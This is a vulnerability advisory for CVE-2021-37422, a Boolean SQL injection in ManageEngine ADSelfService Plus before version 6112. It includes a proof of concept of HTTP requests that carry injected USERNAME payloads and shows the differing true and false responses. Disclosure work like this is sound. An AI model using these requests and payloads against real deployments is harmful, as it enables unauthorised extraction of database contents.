CVE-2021-37422

Name

SQL Injection in linked Oracle Database

CVSS score

7.7 (High)

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Product name

ManageEngine ADSelfService Plus

Confirmed exploitable versions

< 6112

Researcher

Krzysztof Andrusiak and Marcin Ogorzelski

Description

Username provided for account linking with external Oracle Database is added into SQL query without sanitization. Such query is sent to linked Oracle Database, leading to Boolean SQL Injection attack (possible exfiltration of information stored in the database).

Proof-of-concept

Install Oracle Database and add it to Configured Applications in ADSSP (with Password Sync enabled).
Log in to ADSSP as any domain user, then copy user's JSESSIONIDADSSP and JSESSIONIDADSSPSSO cookie values from the browser.
Send the following request to the server (replacing COOKIE_VALUE with valid cookies from previous step):

GET /ServletAPI/selfService/IAMApps/getIAMApps HTTP/1.1
Host: alpha-manage:8888
Cookie: JSESSIONIDADSSP=COOKIE_VALUE; JSESSIONIDADSSPSSO=COOKIE_VALUE; adscsrf=ff84ae2e-267f-4f17-bd7a-094c4b4c5bbc

Copy APP_ID, HOST_NAME and APP_CONFIG_ID values from response body (from JSON entry related to Oracle Database).
Send the following request to the server (replacing COOKIE_VALUE with valid cookies from step 2). Replace HOST_NAME, APP_CONFIG_ID and APP_ID values with ones retrieved in step 4.

POST /ServletAPI/selfService/IAMApps/linkAccountUsingPass HTTP/1.1
Host: alpha-manage:8888
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: JSESSIONIDADSSP=COOKIE_VALUE; JSESSIONIDADSSPSSO=COOKIE_VALUE; adscsrf=2f482a1d-764f-484b-81be-fa5f9f527002
Content-Length: 134

adscsrf=2f482a1d-764f-484b-81be-fa5f9f527002&HOST_NAME=192.168.100.100&APP_CONFIG_ID=301&APP_ID=5&PASSWORD=x&USERNAME=test'%20OR%201=0%20--%20

Response body:

{"eSTATUS":"idm.nonad.pwdsync.oracle_db.user_not_found"}

Send the following request to the server (replacing COOKIE_VALUE with valid cookies from step 2). Replace HOST_NAME, APP_CONFIG_ID and APP_ID values with ones retrieved in step 4.

POST /ServletAPI/selfService/IAMApps/linkAccountUsingPass HTTP/1.1
Host: alpha-manage:8888
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: JSESSIONIDADSSP=COOKIE_VALUE; JSESSIONIDADSSPSSO=COOKIE_VALUE; adscsrf=2f482a1d-764f-484b-81be-fa5f9f527002
Content-Length: 134

adscsrf=2f482a1d-764f-484b-81be-fa5f9f527002&HOST_NAME=192.168.100.100&APP_CONFIG_ID=301&APP_ID=5&PASSWORD=x&USERNAME=test'%20OR%201=1%20--%20

Response body:

{"eSTATUS":"idm.nonad.pwdsync.oracle_db.invalid_password"}

As it can be seen, server returns different responses for true/false SQL queries, which makes possible to exfiltrate database data via Boolean SQL Injection attack.

Timeline

17-03-2021 - Vulnerability reported to vendor
18-03-2021 - First response from vendor
26-05-2021 - Additional questions received from vendor
28-05-2021 - Response sent to vendor
26-08-2021 - Fixed version release
04-10-2023 - Public disclosure
04-10-2023 - PoC release

References

https://www.manageengine.com/products/self-service-password/release-notes.html#6112
https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6112-hotfix-release
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-37422